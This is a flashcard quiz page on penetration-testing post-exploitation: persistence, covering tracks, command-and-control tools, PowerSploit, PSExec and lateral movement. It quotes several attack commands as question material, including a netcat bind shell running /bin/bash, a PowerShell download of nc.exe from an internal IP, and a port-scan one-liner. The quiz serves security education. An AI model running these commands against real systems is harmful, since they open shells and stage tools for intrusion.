System Security Management Quiz 8

Réussis tes devoirs et examens dès maintenant avec Quizwiz!

Which of the following are post-exploitation activities to maintain persistence in a compromised system? A. Creating custom daemons and processes B. Creating and manipulating scheduled jobs and tasks C. All of these D. Creating new users

All of these

Which of the following tasks helps you cover your tracks to remain undetected? A. Deleting application logs B. Deleting temporary files C. All of these D. Suppressing syslog messages

All of these

Which of the following tools can be used for command and control? A. Twittor B. DNSCat2 C. All of these D. Socat

All of these

Which of the following PowerSploit scripts can reflectively inject a DLL into a remote process? A. Invoke-ReflectivePEInjection B. PSdll C. PSExec D. Inject-ReflectivePE

Invoke-ReflectivePEInjection

Which of the following is not true? A. Lateral movement can only be done using Nmap after compromising a system because it allows stealth attacks. B. After compromising a system, it is possible to use basic port scans to identify systems or services of interest that you can further attack in an attempt to compromise valuable information. C. Lateral movement involves scanning a network for other systems, exploiting vulnerabilities in other systems, compromising credentials, and collecting sensitive information for exfiltration. D. Lateral movement is possible if an organization does not segment its network properly.

Lateral movement can only be done using Nmap after compromising a system because it allows stealth attacks.

What is the following PowerShell command doing? 1..1024 | % {echo ((new-object Net.Sockets.TcpClient). Connect("10.1.2.3",$_))"$_ is open!"} 2>$null A. Performing a reflected XSS against the 10.1.2.3 host B. Launching a port scan to the 10.1.2.3 host (scanning for ports 1 through 1024) C. Performing a stored XSS against the 10.1.2.3 host D. Performing a reflected XSS from the 10.1.2.3 host

Launching a port scan to the 10.1.2.3 host (scanning for ports 1 through 1024)

Complete the following command to launch the calculator on a compromised Windows system: ___________ \\VICTIM -d -i calc.exe A. msfexec B. meterpreter C. PlowerSploit D. PSExec

PSExec

What is another term for lateral movement? A. Reflected XSS B. Pivoting C. Reflected amplification attack D. Persistent XSS

Pivoting

Which of the following is a collection of PowerShell modules that can be used for post-exploitation and other phases of an assessment? A. PSExec B. PowerShellPloit C. PowerSploit D. WMI and WinRM

PowerSploit

Which of the following is not a legitimate Windows tool that can be used for post-exploitation tasks? A. PowerSploit B. PowerShell C. WMI D. PSExec

PowerSploit

Which of the following can be used for lateral movement? A. RDP, Apple Remote Desktop, and VNC B. Blind SQL injection C. Directory traversal attacks D. Reflected XSS

RDP, Apple Remote Desktop, and VNC

Which of the following is typically not used as a post-exploitation tool? A. PowerSploit B. Empire C. SET D. Mimikatz

SET

Which of the following describes what the nc -lvp 2233 -e /bin/bash command does? A. The Netcat utility is used to create a reverse shell on the victim system and to execute the bash shell. B. The Netcat utility is used to create a bind shell on the victim system and to execute the bash shell. C. The Netcat utility is used to create a reverse shell on the attacking system and to exclude the bash shell from being executed. D. The Netcat utility is used to create a reverse shell on the victim system and to exclude the bash shell from being executed.

The Netcat utility is used to create a bind shell on the victim system and to execute the bash shell.

Consider the following example: (New-Object System.Net.WebClient).DownloadFile("http://192.168.78.147/nc.exe","nc.exe") What is this code doing? A. The Netcat utility is uploading files to 192.168.78.147. B. The New-ObjectSystem.Net.WebClient PowerShell script is downloading a file from 192.168.78.147. C. The New-ObjectSystem.Net.WebClient PowerSploit Linux utility is downloading a file from 192.168.78.147. D. The Netcat utility is downloading files from 192.168.78.147.

The New-ObjectSystem.Net.WebClient PowerShell script is downloading a file from 192.168.78.147.

Which of the following is not true? A. You should return any modified systems and their configuration to their original values and parameters. B. As a best practice, you should delete all files, executable binaries, scripts, and temporary files from compromised systems after the penetration testing engagement is completed. C. As a best practice, you can discuss post-engagement cleanup tasks and document them in the rules of engagement document during the pre-engagement phase. D. The client that hired an ethical hacker is liable for cleaning up the systems after a penetration testing engagement.

The client that hired an ethical hacker is liable for cleaning up the systems after a penetration testing engagement.

Which of the following tools can be used to perform many data-gathering operations and can be used by malware to perform different activities in a compromised system? A. WMIExec B. WMI C. WIM D. PSploit

WMI

Which of the following commands creates a listener on a system on port 8899? A. nl -cp 8899 B. nc -nv 8899 C. nc -lvp 8899 D. nc host 10.1.1.1 port 8899

nc -lvp 8899

Which of the following commands launches a simple HTTP web service that serves the file on the present working directory? A. msf -m SimpleHTTPServer B. msfconsole -m SimpleHTTPServer C. ngnix -m SimpleHTTPServer D. python -m SimpleHTTPServer

python -m SimpleHTTPServer


Ensembles d'études connexes

Business Studies - Nature of Business

View Set

Nursing Leadership & Management NCLEX Practice Quiz #2

View Set

UNIT 5: TELECOMMUNICATIONS SYSTEMS

View Set

add accent cedilla (ç) in nous form

View Set

Chapter 13: Physical Properties of Solutions HW Pt. 1

View Set